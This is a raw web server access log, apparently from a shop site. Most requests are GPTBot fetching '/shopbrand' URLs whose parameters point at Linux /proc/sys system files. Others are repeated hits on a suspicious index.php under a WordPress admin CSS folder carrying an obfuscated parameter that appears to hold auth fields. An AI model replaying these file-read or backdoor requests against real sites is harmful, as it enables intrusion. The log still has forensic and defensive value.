74.7.227.128 - - [05/Nov/2025:21:18:45 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/accept_redirects&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:48 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/default/max_desync_factor&path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 2535 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:54 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/router_solicitations&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:59 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/accept_ra_pinfo&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:17:00 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353832302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323232302q6630386430653639363163353863613166313930623034623639363862393235222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:19:02 +0700] "GET /shopbrand557852348?path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 3282 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:06 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/stable_secret&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:12 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/force_tllao&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:15 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/autoconf&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:18 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/accept_ra&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:17:23 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353834332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323234332q6531363931633833613962316463643334633335333236356362643065396432222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
57.141.14.87 - - [05/Nov/2025:21:19:24 +0700] "GET /shopbrand1137482784?kg=1135005066 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:19:25 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/mtu&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:29 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/retrans_time&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2534 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:35 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/mcast_solicit&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:38 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/anycast_delay&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2535 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:42 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/ucast_solicit&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2534 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:45 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/base_reachable_time&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2538 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:17:46 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353836362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323236362q3666336463653838613064376536663163343636303464313562386332396463222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:19:51 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/app_solicit&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:54 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/locktime&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:19:58 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/base_reachable_time_ms&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:20:01 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/router_solicitation_interval&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:20:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/delay_first_probe_time&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2492 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:18:08 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353838382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323238382q3532373532313636383838336464383531363530393431386165653862396131222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:20:10 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/forwarding&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:20:16 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/accept_source_route&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:20:21 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/router_probe_interval&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:20:25 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/router_solicitation_delay&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:20:31 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/max_addresses&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:18:30 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353931302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323331302q3864323263326561306431623163343862616364326566626131356330386165222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:20:34 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/accept_dad&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:20:38 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/dad_transmits&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:20:44 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/mc_forwarding&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:20:52 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/use_optimistic&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:18:52 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353933322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323333322q6136643232633831333361376234333238386138623834626331333662393638222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:20:55 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/accept_ra_rtr_pref&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:00 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/accept_ra_rt_info_max_plen&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:04 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/disable_ipv6&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:07 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/temp_valid_lft&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:13 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/optimistic_dad&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:19:14 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353935342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323335342q3263343962386535396236663338633734653863313933393262303930636332222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:21:18 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/force_mld_version&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:23 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/accept_ra_defrtr&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:27 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/max_desync_factor&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:30 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/proxy_ndp&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:33 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/hop_limit&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:19:36 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353937362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323337362q3663623436386364383966336565643463303630303834366663343832646565222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:21:39 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/use_tempaddr&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:44 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/temp_prefered_lft&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2524 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:47 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/retrans_time_ms&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:53 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/proxy_qlen&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2534 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:21:57 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/unres_qlen&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2534 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:19:58 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353939382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323339382q3135666337366637353266333635326161363236373764356561353236653632222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:22:03 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/proxy_delay&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:07 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/unres_qlen_bytes&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:13 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/neigh/enp1s0f0/gc_stale_time&path=//proc/sys/net/ipv4/neigh/enp1s0f0 HTTP/2" 200 2534 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:18 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/mldv1_unsolicited_report_interval&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2535 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:20:20 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335363032302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323432302q6637653835383863366437303631356532333033376135386537343630363139222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:22:25 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/regen_max_retry&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:29 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/default/mc_forwarding&path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:32 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/default/mtu&path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 2525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:35 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/default/autoconf&path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 2524 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:38 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/mldv2_unsolicited_report_interval&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:20:42 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335363034322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323434322q3838346561313731633339353465303030353935356230646436333261323630222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:22:45 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/default/force_tllao&path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:48 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/default/accept_ra&path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 2525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:55 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/default/accept_source_route&path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 2533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:22:59 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/rp_filter&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2524 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
